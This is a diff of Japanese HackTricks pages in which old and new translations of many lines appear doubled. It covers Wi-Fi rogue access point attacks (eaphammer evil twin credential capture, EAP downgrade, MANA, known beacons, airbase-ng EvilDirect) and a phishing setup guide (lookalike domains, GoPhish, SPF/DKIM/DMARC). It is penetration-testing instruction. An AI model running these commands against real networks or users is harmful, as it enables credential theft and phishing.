./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds
```
デフォルトでは、EAPHammerはこの認証方法を目的としています平文パスワードを取得するために最初にGTCを試み、その後より堅牢な認証方法を使用します):
デフォルトでは、EAPHammerはこの認証方法を使用します平文パスワードを取得するために最初にGTCを試し、その後より堅牢な認証方法を使用します):
```
GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5
```
これは長い接続時間を避けるためのデフォルトの方法論です。ただし、最も弱い認証方法から最も強い方法まで、サーバーに認証方法を指定することもできます。
これは長い接続時間を避けるためのデフォルトの方法論です。ただし、最も弱い認証方法から最も強い方法まで、サーバーに指定することもできます。
```
--negotiate weakest
```
または次のように使用することもできます:
または、次のようにしても利用できます:
* `--negotiate gtc-downgrade` を使用して、高効率のGTCダウングレード実装平文パスワードを使用します。
* `--negotiate manual --phase-1-methods PEAP,TTLS --phase-2-methods MSCHAPV2,GTC,TTLS-PAP` を指定して、手動で提供されるメソッドを指定します(攻撃対象の組織と同じ認証メソッドを同じ順序で提供すると、攻撃を検出するのがはるかに難しくなります)。
@ -612,7 +614,7 @@ GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5
**Airgeddonを使用する**
`Airgeddon` は以前に生成された証明書を使用して、WPA/WPA2-EnterpriseネットワークにEAP認証を提供できます。偽のネットワークは接続プロトコルをEAP-MD5にダウングレードするため、**ユーザーとパスワードのMD5をキャプチャ**できます。後で、攻撃者はパスワードを解読しようと試みることができます。\
`Airggedon` は**連続したEvil Twin攻撃イジー**または**誰かが接続するまでEvil Attackを作成するだけ(スムーズ)**の可能性を提供します。
`Airggedon` は**連続的なイービルツイン攻撃(ノイジー)**または**誰かが接続するまでイービルアタックを作成するだけ(スムーズ)**の可能性を提供します。
![](<../../.gitbook/assets/image (129).png>)
@ -620,18 +622,18 @@ GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5
_この方法はPEAP接続でテストされましたが、任意のTLSトンネルを復号化しているため、EAP-TTLSでも機能するはずです_
_hostapd-wpe_の**構成**内で、_**dh\_file**_を含む行を**コメントアウト**します(`dh_file=/etc/hostapd-wpe/certs/dh` から `#dh_file=/etc/hostapd-wpe/certs/dh` に)\
_hostapd-wpe_の**構成**内で、`dh_file=/etc/hostapd-wpe/certs/dh` から `#dh_file=/etc/hostapd-wpe/certs/dh` を含む行を**コメントアウト**します。\
これにより、`hostapd-wpe` がDHの代わりにRSAを使用して鍵を交換するようになり、後で**サーバーの秘密鍵を知っている**場合にトラフィックを**復号**できるようになります。
今、通常どおりに修正された構成を使用して**Evil Twin**を開始する**`hostapd-wpe`**を開始します。また、Evil Twin攻撃を実行している**インターフェース**で**`wireshark`**を開始します。
今、通常どおり変更された構成を使用して**hostapd-wpe**を起動して**Evil Twin**を開始します。また、Evil Twin攻撃を実行している**インターフェース**で**`wireshark`**を起動します。
今すぐまたは後ですでにいくつかの認証意図をキャプチャしている場合、wiresharkにプライベートRSA鍵を追加できます: `Edit --> Preferences --> Protocols --> TLS --> (RSA keys list) Edit...`
今すぐまたは後で(すでにいくつかの認証意図をキャプチャしている場合)、RSAキーをwiresharkに追加できます: `Edit --> Preferences --> Protocols --> TLS --> (RSA keys list) Edit...`
新しいエントリを追加し、この値でフォームを記入します: **IPアドレス = any** -- **ポート = 0** -- **プロトコル = data** -- **キーファイル****キーファイルを選択**し、問題を避けるために**パスワード保護されていないキーファイル**を選択します)。
新しいエントリを追加し、次の値を入力します: **IPアドレス = any** -- **ポート = 0** -- **プロトコル = data** -- **キーファイル****キーファイルを選択**し、問題を避けるために**パスワード保護されていないキーファイル**を選択します)。
![](<../../.gitbook/assets/image (151).png>)
そして新しい**"Decrypted TLS"タブ**を見てください:
そして新しい**"Decrypted TLS"タブ**を見てください:
![](<../../.gitbook/assets/image (152).png>)
@ -639,66 +641,68 @@ _hostapd-wpe_の**構成**内で、_**dh\_file**_を含む行を**コメント
### ESSIDおよびMACブラック/ホワイトリスト
次の表は、使用可能なMFACLManagement Frame Access Control Listsの異なるタイプと、それらを使用した場合の効果をリストしています
異なる種類のMedia Access Control Filter ListsMFACLsとそれらに対応するローグアクセスポイントAPの動作に及ぼす影響のモード
![](<../../.gitbook/assets/image (149).png>)
```
1. **MACベースのホワイトリスト**:
- ローグAPは、ホワイトリストに指定されたデバイスからのプローブリクエストにのみ応答し、リストされていないすべてのデバイスには見えなくなります。
2. **MACベースのブラックリスト**:
- ローグAPは、ブラックリスト上のデバイスからのプローブリクエストを無視し、特定のデバイスには見えなくなります。
3. **SSIDベースのホワイトリスト**:
- ローグAPは、指定されたESSIDのみに対するプローブリクエストにのみ応答し、そのESSIDが含まれていないデバイスには見えなくなります。
4. **SSIDベースのブラックリスト**:
- ローグAPは、ブラックリスト上の特定のESSIDに対するプローブリクエストには応答せず、その特定のネットワークを探しているデバイスには見えなくなります。
```bash
# example EAPHammer MFACL file, wildcards can be used
78:f0:97:fc:b5:36
9a:35:e1:01:4f:cf
69:19:14:60:20:45
ce:52:b8:*:*:*
09:6a:06:c8:36:af
37:ab:46:7a:9a:7c
c7:36:8c:b2:*:*
[--mac-whitelist /path/to/mac/whitelist/file.txt #EAPHammer whitelisting]
[--mac-blacklist /path/to/mac/blacklist/file.txt #EAPHammer blacklisting]
```
```
```bash
# example ESSID-based MFACL file
apples
oranges
grapes
pears
name1
name2
name3
[--ssid-whitelist /path/to/mac/whitelist/file.txt]
[--ssid-blacklist /path/to/mac/blacklist/file.txt]
```
### KARMA
Karma攻撃は、ステーションが使用するネットワーク選択プロセスを悪用するローグアクセスポイント攻撃の第二の形態です。2005年に書かれたホワイトペーパーでは、Dino Dai ZoviとShane Macaulayが、アクセスポイントを設定して、指向性プローブリクエストを受信し、それに一致する指向性プローブレスポンスで応答することで、攻撃者がアクセスポイントを構成できる方法が記載されています。これにより、影響を受けるステーションは、自動的に攻撃者のアクセスポイントに関連付けリクエストを送信します。その後、アクセスポイントは関連付けレスポンスで応答し、影響を受けるステーションが攻撃者に接続するようにします。
この方法は、**デバイスがネットワークに接続しようとする際に発信されるすべてのプローブリクエストに応答する悪意のあるアクセスポイントAPを作成する**ことを攻撃者に可能にします。この技術は、デバイスが検索しているネットワークを模倣することで、**デバイスを攻撃者のAPに接続させる**ことができます。デバイスがこの不正なAPに接続要求を送信すると、接続が完了し、デバイスが誤って攻撃者のネットワークに接続するようになります。
### MANA
Ian de VilliersとDominic Whiteによると、現代のステーションは、少なくとも1つのブロードキャストプローブリクエストにすでに応答していないアクセスポイントからの指向性プローブレスポンスを無視することで、Karma攻撃に対して自己保護されるように設計されています。これにより、Karma攻撃に対して脆弱なステーションの数が大幅に減少しましたが、2015年にWhiteとde Villiersがそのような保護を回避する手段を開発しました。Whiteとde Villiersによる改良されたKarma攻撃MANA攻撃では、指向性プローブレスポンスを使用して近くのステーションのPNLを再構築します。ステーションからブロードキャストプローブリクエストが受信されると、攻撃者のアクセスポイントは、そのデバイスからの直接プローブで既に見られているデバイスのPNLから任意のSSIDで応答します。
その後、**デバイスは未要求のネットワーク応答を無視し始め**、元のkarma攻撃の効果が低下しました。しかし、Ian de VilliersとDominic Whiteによって導入された**MANA攻撃**として知られる新しい方法があります。この方法では、ローグAPが、デバイスが以前に要求したネットワーク名SSIDに応答して、デバイスからのブロードキャストプローブリクエストをキャプチャし、**デバイスからの優先ネットワークリストPNLを取得**します。この洗練された攻撃は、デバイスが既知のネットワークを記憶し優先順位付けする方法を悪用することで、元のkarma攻撃に対する保護をバイパスします。
要約すると、MANAアルゴリズムは次のように機能します。アクセスポイントがプローブリクエストを受信するたびに、まずそれがブロードキャストか指向性プローブかを判断します。指向性プローブの場合、送信元のMACアドレスがハッシュテーブルに追加されまだ存在しない場合、そのデバイスのPNLにESSIDが追加されます。その後、APは指向性プローブレスポンスで応答します。ブロードキャストプローブの場合、アクセスポイントはそのデバイスのPNL内の各ネットワークに対してプローブレスポンスで応答します。
eaphammerを使用したMANA攻撃
```
MANA攻撃は、デバイスからの指示されたプローブリクエストとブロードキャストプローブリクエストの両方を監視して動作します。指示されたリクエストの場合、デバイスのMACアドレスと要求されたネットワーク名を記録し、この情報をリストに追加します。ブロードキャストリクエストが受信されると、APはデバイスのリストにあるネットワークと一致する情報で応答し、デバイスをローグAPに接続させるよう誘導します。
```bash
./eaphammer -i wlan0 --cloaking full --mana --mac-whitelist whitelist.txt [--captive-portal] [--auth wpa-psk --creds]
```
### ラウドMANA
標準のMANA攻撃では、直接のプロービングを使用しないデバイスを攻撃することはできません。したがって、デバイスのPNL内のエントリを事前に把握していない場合、別の攻撃方法を考える必要があります。
可能性の一つは、ラウドMANA攻撃と呼ばれるものです。この攻撃は、物理的に近接しているクライアントデバイスが、少なくともPNL内のいくつかの共通エントリを持っている可能性が高いという考えに基づいています。
要約すると、ラウドMANA攻撃は、特定のデバイスのPNL内の各ESSIDに対してプローブリクエストに応答するのではなく、ローグAPは以前に見たすべてのデバイスのすべてのPNL内のすべてのESSIDに対してプローブレスポンスを送信します。これを集合論に関連付けると、APは近くのデバイスのすべてのPNLの和集合内の各ESSIDに対してプローブレスポンスを送信します。
```
**ラウドMANA攻撃**は、デバイスが指向性プロービングを使用しない場合や、そのデバイスの優先ネットワークリストPNLが攻撃者に不明な場合のための高度な戦略です。この攻撃は、**同じエリアにあるデバイスはPNLでいくつかのネットワーク名を共有する可能性が高い**という原則に基づいています。選択的に応答する代わりに、この攻撃は観測されたすべてのデバイスの結合されたPNLにあるすべてのネットワーク名ESSIDに対してプローブ応答をブロードキャストします。この広範なアプローチにより、デバイスが馴染みのあるネットワークを認識し、ローグアクセスポイントAPに接続しようとする可能性が高まります。
```bash
./eaphammer -i wlan0 --cloaking full --mana --loud [--captive-portal] [--auth wpa-psk --creds]
```
### 既知のビーコン攻撃
まだLoud MANA攻撃が成功しないケースがあります。\
既知のビーコン攻撃は、被害者を攻撃者に接続させようとするためのESSIDを「ブルートフォース」する方法です。攻撃者は、任意のESSIDに応答するAPを作成し、ビーコンを送信するコードを実行して、ワードリスト内の各名前のESSIDを偽装します。被害者がPNL内にこれらのESSID名のいくつかを含んでいることを期待し、偽のAPに接続しようとします。\
Eaphammerは、この攻撃をMANA攻撃として実装し、リスト内のすべてのESSIDがロードされます(これに`--loud`を組み合わせてLoud MANA + 既知のビーコン攻撃を作成することもできます)。
```
**Loud MANA攻撃**が十分でない場合、**既知のビーコン攻撃**は別のアプローチを提供します。この方法は、**ワードリストから派生した潜在的なESSIDのリストをサイクリングしながら、任意のネットワーク名に応答するAPをシミュレートすることで、接続プロセスをブルートフォースします**。これにより、多数のネットワークが存在するかのようにシミュレートされ、被害者のPNL内のESSIDと一致することを期待し、偽のAPへの接続試行が促されます。攻撃は、デバイスを捕らえるより積極的な試みのために`--loud`オプションと組み合わせることで強化できます。
Eaphammerは、この攻撃をMANA攻撃として実装し、リスト内のすべてのESSIDが充電されます(`--loud`を組み合わせてLoud MANA + Known beacons攻撃を作成することもできます)。
```bash
./eaphammer -i wlan0 --mana [--loud] --known-beacons --known-ssids-file wordlist.txt [--captive-portal] [--auth wpa-psk --creds]
```
**既知のビーコンバースト攻撃**
既知のビーコンは大きな存在です。Eaphammerプロジェクト内のスクリプトを使用して、ファイル内のすべてのESSID名のビーコンを非常に迅速に発信することができます。このスクリプトをEaphammer MANA攻撃と組み合わせると、クライアントはあなたのAPに接続できるようになります。
```
**既知のビーコンバースト攻撃**には、**ファイルにリストされた各ESSIDのためにビーコンフレームを高速でブロードキャストする**という手法が含まれます。これにより、偽のネットワークの密集環境が作成され、MANA攻撃と組み合わせると、デバイスがローグAPに接続する可能性が大幅に高まります。この技術は、速度とボリュームを活用して、デバイスのネットワーク選択メカニズムを圧倒します。
```bash
# transmit a burst of 5 forged beacon packets for each entry in list
./forge-beacons -i wlan1 \
--bssid de:ad:be:ef:13:37 \
@ -708,15 +712,18 @@ Eaphammerは、この攻撃をMANA攻撃として実装し、リスト内のす
```
## Wi-Fi Direct
Wi-Fi Directは、ワイヤレスAPなしでデバイス同士を接続するためのWi-Fi標準であり、2つのデバイスのうち1つがAPとして機能するグループオーナーと呼ばれることができます。プリンターやテレビなどの多くのIoTデバイスでWi-Fi Directを見つけることができます。
**Wi-Fi Direct**は、従来のワイヤレスアクセスポイントを必要とせずに、デバイス同士がWi-Fiを使用して直接リンクするためのプロトコルです。この機能は、プリンターやテレビなどのさまざまなインターネット・オブ・シングスIoTデバイスに統合されており、デバイス間の直接通信を容易にします。Wi-Fi Directの注目すべき特徴の1つは、1つのデバイスが接続を管理するためのアクセスポイントであるグループオーナーの役割を担うことです。
Wi-Fi Directは、デバイスを安全に接続するためにWi-Fi Protected Setup**WPS**に依存しています。WPSには、**Push-Button** ConfigurationPBC、**PIN entry**、および**Near-Field** CommunicationNFCなど、複数の構成方法があります。
Wi-Fi Direct接続のセキュリティは、**Wi-Fi Protected SetupWPS**を介して確立されます。これには、次のような安全なペアリングのためのいくつかの方法がサポートされています:
- **Push-Button ConfigurationPBC**
- **PIN入力**
- **Near-Field CommunicationNFC**
したがって、PINが使用されている場合、WPS PINに以前見られた攻撃はここでも有効です。
これらの方法、特にPIN入力は、従来のWi-FiネットワークのWPSと同様の脆弱性に対して脆弱であり、同様の攻撃ベクトルの標的となります。
### EvilDirect Hijacking
これはEvil-Twinのように機能しますが、Wi-Fi Direct向けであり、他のデバイス電話があなたに接続するようにグループオーナーをなりすますことができます`airbase-ng -c 6 -e DIRECT-5x-BRAVIA -a BB:BB:BB:BB:BB:BB mon0`
**EvilDirect Hijacking**は、Wi-Fi Directに特有の攻撃です。これはEvil Twin攻撃の概念を反映しており、Wi-Fi Direct接続を標的としています。このシナリオでは、攻撃者が正当なグループオーナーをなりすまし、デバイスを悪意のあるエンティティに接続させることを目的としています。この方法は、`airbase-ng`などのツールを使用して、なりすまされたデバイスのチャンネル、ESSID、およびMACアドレスを指定することで実行できます
## 参考文献
@ -728,6 +735,8 @@ Wi-Fi Directは、デバイスを安全に接続するためにWi-Fi Protected S
* [http://solstice.sh/wireless/eaphammer/2019/09/10/eap-downgrade-attacks/](http://solstice.sh/wireless/eaphammer/2019/09/10/eap-downgrade-attacks/)
* [https://www.evilsocket.net/2019/02/13/Pwning-WiFi-networks-with-bettercap-and-the-PMKID-client-less-attack/](https://www.evilsocket.net/2019/02/13/Pwning-WiFi-networks-with-bettercap-and-the-PMKID-client-less-attack/)
* [https://medium.com/hacking-info-sec/ataque-clientless-a-wpa-wpa2-usando-pmkid-1147d72f464d](https://medium.com/hacking-info-sec/ataque-clientless-a-wpa-wpa2-usando-pmkid-1147d72f464d)
* [https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-(Offline-WPS-Attack)](https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-\(Offline-WPS-Attack\))
* [https://www.evilsocket.net/2019/02/13/Pwning-WiFi-networks-with-bettercap-and-the-PMKID-client-less-attack/](https://www.evilsocket.net/2019/02/13/Pwning-WiFi-networks-with-bettercap-and-the-PMKID-client-less-attack/)
TODO: [https://github.com/wifiphisher/wifiphisher](https://github.com/wifiphisher/wifiphisher)をチェックしてくださいFacebookログインとキャプティブポータルでのWPAの模倣
@ -739,9 +748,9 @@ TODO: [https://github.com/wifiphisher/wifiphisher](https://github.com/wifiphishe
ハッキングのスリルとチャレンジに深く入り込むコンテンツに参加しましょう
**リアルタイムのハックニュース**\
リアルタイムのニュースと情報を通じて、ハッキングの世界を最新の状態で把握しましょう
リアルタイムのニュースと洞察を通じて、ハッキングの世界を最新の状態に保ちましょう
**最新のアナウンスメント**\
**最新の発表**\
最新のバグバウンティの開始や重要なプラットフォームの更新情報を把握しましょう
[**Discord**](https://discord.com/invite/N3FrSbmwdy)に参加して、今日からトップハッカーと協力を始めましょう!
**[**Discord**](https://discord.com/invite/N3FrSbmwdy)に参加して、今日からトップハッカーと協力を始めましょう!**

220
generic-methodologies-and-resources/phishing-methodology/README.md
View file

@ -2,100 +2,100 @@
<details>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>でAWSハッキングをゼロからヒーローまで学びましょう</strong></a><strong></strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>でAWSハッキングをゼロからヒーローまで学</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法
- **HackTricksで企業を宣伝**したい場合や**HackTricksをPDFでダウンロード**したい場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
- **Discordグループ**に**参加**する💬https://discord.gg/hRep4RUj7fまたは[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦で**フォロー**する[**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
- **HackTricks**https://github.com/carlospolop/hacktricksと[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有してください。
* **HackTricksで企業を宣伝**したい場合や**HackTricksをPDFでダウンロード**したい場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)をフォローする
* **ハッキングトリックを共有するために** [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出する
</details>
## 手法
1. ターゲットの情報収集
1. ターゲットを調査する
1. **ターゲットドメイン**を選択する。
2. ターゲットが使用しているログインポータルを検索し、**なりすます**ことに決めるために基本的なWeb列挙を実行する。
2. ターゲットが使用しているログインポータルを検索し、**なりすます**ためにどれを選択するかを**決定**するために基本的なWeb列挙を実行する。
3. いくつかの**OSINT**を使用して**メールアドレスを見つける**。
2. 環境の準備
2. 環境を準備する
1. フィッシングアセスメントに使用するドメインを**購入**する
2. 関連するレコードSPF、DMARC、DKIM、rDNSを**設定する**
2. 関連するレコードSPF、DMARC、DKIM、rDNSを**構成するメールサービス**を構成する
3. **gophish**を使用してVPSを構成する
3. キャンペーンの準備
3. キャンペーンを準備する
1. **メールテンプレート**を準備する
2. 資格情報を盗むための**Webページ**を準備する
4. キャンペーンを開始する!
## 類似のドメイン名を生成するか信頼できるドメインを購入する
### ドメイン名の変更手法
### ドメイン名の変更技術
- **キーワード**: オリジナルドメインの重要な**キーワードを含む**ドメイン名zelster.com-management.com
- **ハイフン付きサブドメイン**: サブドメインの**ドットをハイフンに変更**するwww-zelster.com
- **新しいTLD**: 同じドメインを**新しいTLD**を使用してzelster.org
- **ホモグリフ**: ドメイン名の1つの文字を**似ている文字で置き換える**zelfser.com
- **転置**: ドメイン名内の2つの文字を**入れ替える**zelster.com
- **単数形/複数形**: ドメイン名の末尾に「s」を追加または削除するzeltsers.com
- **省略**: ドメイン名から1つの文字を**削除する**zelser.com
- **繰り返し**: ドメイン名内の1つの文字を**繰り返す**zeltsser.com
- **置換**: ホモグリフよりも洗練されていないが、ドメイン名内の1つの文字を置き換え、おそらく元の文字の隣にあるキーボード上の文字で置き換えるzektser.com
- **サブドメイン**: ドメイン名内に**ドット**を挿入するze.lster.com
- **挿入**: ドメイン名に**文字を挿入する**zerltser.com
- **ドットの欠落**: ドメイン名にTLDを追加するzelstercom.com
* **キーワード**: オリジナルドメインの重要な**キーワードを含む**ドメイン名zelster.com-management.com
* **ハイフン付きサブドメイン**: サブドメインの**ドットをハイフンに変更**するwww-zelster.com
* **新しいTLD**: 同じドメインを**新しいTLD**を使用してzelster.org
* **ホモグリフ**: ドメイン名の文字を**似ている文字で置き換える**zelfser.com
* **転置**: ドメイン名内の2つの文字を**入れ替える**zelster.com
* **単数形/複数形**: ドメイン名の末尾に「s」を追加または削除するzeltsers.com
* **省略**: ドメイン名から1つの文字を**削除する**zelser.com
* **繰り返し**: ドメイン名内の1つの文字を**繰り返す**zeltsser.com
* **置換**: ホモグリフと似ていますが、より控えめです。ドメイン名の1つの文字を、おそらくキーボード上で元の文字に近い文字で置き換えますzektser.com
* **サブドメイン**: ドメイン名内に**ドット**を挿入するze.lster.com
* **挿入**: ドメイン名に**文字を挿入する**zerltser.com
* **ドットの欠落**: ドメイン名にTLDを追加するzelstercom.com
**自動ツール**
- [**dnstwist**](https://github.com/elceef/dnstwist)
- [**urlcrazy**](https://github.com/urbanadventurer/urlcrazy)
* [**dnstwist**](https://github.com/elceef/dnstwist)
* [**urlcrazy**](https://github.com/urbanadventurer/urlcrazy)
**ウェブサイト**
- [https://dnstwist.it/](https://dnstwist.it)
- [https://dnstwister.report/](https://dnstwister.report)
- [https://www.internetmarketingninjas.com/tools/free-tools/domain-typo-generator/](https://www.internetmarketingninjas.com/tools/free-tools/domain-typo-generator/)
* [https://dnstwist.it/](https://dnstwist.it)
* [https://dnstwister.report/](https://dnstwister.report)
* [https://www.internetmarketingninjas.com/tools/free-tools/domain-typo-generator/](https://www.internetmarketingninjas.com/tools/free-tools/domain-typo-generator/)
### ビットフリップ
コンピューティングの世界では、すべてがメモリ内のビット0と1に格納されています。\
これはドメインにも当てはまります。たとえば、_windows.com_は、コンピューティングデバイスの揮発性メモリ内で_01110111..._になります。\
ただし、太陽フレア、宇宙線、またはハードウェアエラーにより、これらのビットの1つが自動的に反転した場合はどうなるでしょうか つまり、0の1になり、その逆もまた然りです。\
この概念をDNSリクエストに適用すると、DNSサーバーに到着する**要求されたドメインが最初に要求されたドメインと同じでない可能性があります**。
**太陽フレア、宇宙線、ハードウェアエラー**などのさまざまな要因により、**保存されたビットや通信中のビットのいくつかが自動的に反転**される可能性があります。
たとえば、ドメインwindows.comの1ビットの変更により、_windnws.com._に変換される可能性があります。\
**攻撃者は、被害者に関連する可能な限り多くのビットフリップドメインを登録して、合法的なユーザーを自分たちのインフラストラクチャにリダイレクトすることができます**。
この概念を**DNSリクエストに適用**すると、DNSサーバーが受信したドメインが最初にリクエストされたドメインと異なる可能性があります。
例えば、ドメイン「windows.com」の1ビットの変更で「windnws.com」に変わる可能性があります。
攻撃者は、被害者のドメインに類似した**複数のビットフリップドメインを登録**し、合法的なユーザーを自分たちのインフラストラクチャにリダイレクトすることを狙っています。
詳細については、[https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/](https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/)を参照してください。
### 信頼できるドメインを購入する
[https://www.expireddomains.net/](https://www.expireddomains.net)で使用可能な期限切れのドメインを検索できます。\
購入する期限切れのドメインが**すでに優れたSEOを持っている**ことを確認するために、次のカテゴリーにどのように分類されているかを調べることができます:
[https://www.expireddomains.net/](https://www.expireddomains.net)で使用できる期限切れのドメインを検索できます。\
購入する期限切れのドメインが**既にSEOが良い**かどうかを確認するために、次のカテゴリにどのように分類されているかを調べることができます:
- [http://www.fortiguard.com/webfilter](http://www.fortiguard.com/webfilter)
- [https://urlfiltering.paloaltonetworks.com/query/](https://urlfiltering.paloaltonetworks.com/query/)
* [http://www.fortiguard.com/webfilter](http://www.fortiguard.com/webfilter)
* [https://urlfiltering.paloaltonetworks.com/query/](https://urlfiltering.paloaltonetworks.com/query/)
## メールアドレスの発見
- [https://github.com/laramies/theHarvester](https://github.com/laramies/theHarvester)100無料
- [https://phonebook.cz/](https://phonebook.cz)100無料
- [https://maildb.io/](https://maildb.io)
- [https://hunter.io/](https://hunter.io)
- [https://anymailfinder.com/](https://anymailfinder.com)
* [https://github.com/laramies/theHarvester](https://github.com/laramies/theHarvester)100無料
* [https://phonebook.cz/](https://phonebook.cz)100無料
* [https://maildb.io/](https://maildb.io)
* [https://hunter.io/](https://hunter.io)
* [https://anymailfinder.com/](https://anymailfinder.com)
より多くの有効なメールアドレスを**発見**したり、すでに発見したメールアドレスを**検証**したりするために、被害者のsmtpサーバーをブルートフォースできるかどうかを確認できます。[ここでメールアドレスを検証/発見する方法を学ぶ](../../network-services-pentesting/pentesting-smtp/#username-bruteforce-enumeration)。\
さらに、ユーザーがメールにアクセスするために**Webポータルを使用**している場合は、**ユーザー名ブルートフォース**に対して脆弱かどうかを確認し、可能であれば脆弱性を悪用できます。
より多くの有効なメールアドレスを発見したり、すでに発見したメールアドレスを**検証**するために、被害者のsmtpサーバーを**ブルートフォース**できるかどうかを確認できます。[ここでメールアドレスを検証/発見する方法を学ぶ](../../network-services-pentesting/pentesting-smtp/#username-bruteforce-enumeration)。\
さらに、ユーザーがメールにアクセスするために**Webポータルを使用**している場合は、**ユーザー名ブルートフォース**に対して脆弱かどうかを確認し、可能であればその脆弱性を悪用できます。
## GoPhishの設定
## GoPhishの構成
### インストール
[https://github.com/gophish/gophish/releases/tag/v0.11.0](https://github.com/gophish/gophish/releases/tag/v0.11.0)からダウンロードできます。
ダウンロードして`/opt/gophish`内に展開し、`/opt/gophish/gophish`を実行します。\
出力には、管理ユーザーのパスワードが3333ポートで表示されます。したがって、そのポートにアクセスし、それらの資格情報を使用して管理者パスワードを変更します。そのポートをローカルにトンネリングする必要がある場合があります。
ダウンロードして`/opt/gophish`内に解凍し、`/opt/gophish/gophish`を実行します。\
出力には、ポート3333の管理ユーザーのパスワードが表示されます。したがって、そのポートにアクセスし、それらの資格情報を使用して管理者パスワードを変更します。そのポートをローカルにトンネリングする必要がある場合があります。
```bash
ssh -L 3333:127.0.0.1:3333 <user>@<ip>
```
@ -173,7 +173,7 @@ Gophishの実行を停止し、設定を行います。\
```
**gophishサービスの設定**
gophishサービスを作成して自動的に起動および管理できるようにするために、次の内容で`/etc/init.d/gophish`ファイルを作成します:
gophishサービスを作成して自動的に起動およびサービスとして管理するために、次の内容でファイル`/etc/init.d/gophish`を作成できます。
```bash
#!/bin/bash
# /etc/init.d/gophish
@ -220,7 +220,7 @@ case $1 in
start|stop|status) "$1" ;;
esac
```
サービスの設定を完了し、次の手順を実行して確認します:
サービスの設定を完了し、次の操作を行って確認します:
```bash
mkdir /var/log/gophish
chmod +x /etc/init.d/gophish
@ -233,9 +233,10 @@ service gophish stop
```
## メールサーバーとドメインの設定
### 待つ
### 待つ & 正当性を保つ
ドメインが古いほど、スパムとして検出される可能性が低くなります。そのため、フィッシングアセスメントを行う前にできるだけ長い時間少なくとも1週間待つべきです。さらに、信頼性の高いセクターに関するページを設置すると、得られる評判が向上します。
ドメインが古いほど、スパムとして検出される可能性が低くなります。そのため、フィッシングアセスメントを行う前にできるだけ長い時間少なくとも1週間待つべきです。\
1週間待たなければならないとしても、今すぐすべてを設定しておくことができます。
### 逆引きDNSrDNSレコードの設定
@ -246,7 +247,7 @@ VPSのIPアドレスをドメイン名に解決するrDNSPTRレコード
新しいドメインには**SPFレコードを設定する必要があります**。SPFレコードが何かわからない場合は、[**このページ**](../../network-services-pentesting/pentesting-smtp/#spf)を参照してください。
[https://www.spfwizard.net/](https://www.spfwizard.net)を使用して、SPFポリシーを生成できますVPSマシンのIPを使用します
[https://www.spfwizard.net/](https://www.spfwizard.net)を使用して、SPFポリシーを生成できますVPSマシンのIPを使用します
![](<../../.gitbook/assets/image (388).png>)
@ -254,9 +255,9 @@ VPSのIPアドレスをドメイン名に解決するrDNSPTRレコード
```bash
v=spf1 mx a ip4:ip.ip.ip.ip ?all
```
### ドメインベースのメッセージ認証、レポー、遵守DMARCレコード
### ドメインベースのメッセージ認証、レポーティング、遵守DMARCレコード
新しいドメインに**DMARCレコードを設定する必要があります**。DMARCレコードが何かわからない場合は、[**このページを読んでください**](../../network-services-pentesting/pentesting-smtp/#dmarc)。
新しいドメインに**DMARCレコードを設定する必要があります**。DMARCレコードが何かわからない場合は、[**このページ**](../../network-services-pentesting/pentesting-smtp/#dmarc)を参照してください
次の内容を持つ新しいDNS TXTレコードを作成して、ホスト名を`_dmarc.<domain>`に向ける必要があります:
```bash
@ -278,11 +279,11 @@ v=DKIM1; h=sha256; k=rsa; p=MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0wPibdqP
### メール構成スコアをテストする
[https://www.mail-tester.com/](https://www.mail-tester.com)を使用してテストできます。\
ページにアクセスして、指されたアドレスにメールを送信してください:
ページにアクセスして、指されたアドレスにメールを送信してください:
```bash
echo "This is the body of the email" | mail -s "This is the subject line" test-iimosa79z@srv1.mail-tester.com
```
あなたのメール構成もチェックできます。`check-auth@verifier.port25.com` にメールを送信し、**応答を読み取る**ことができます(これにはポート **25** を**開いて**、root としてメールを送信した場合はファイル _/var/mail/root_ で応答を確認する必要があります)。\
あなたのメール構成をチェックすることもできます。`check-auth@verifier.port25.com` にメールを送信し、**応答を読む**ことができます(これにはポート **25** を**開いて**、ルートとしてメールを送信した場合はファイル _/var/mail/root_ で応答を確認する必要があります)。
すべてのテストに合格していることを確認してください:
```bash
==========================================================
@ -294,17 +295,17 @@ DKIM check: pass
Sender-ID check: pass
SpamAssassin check: ham
```
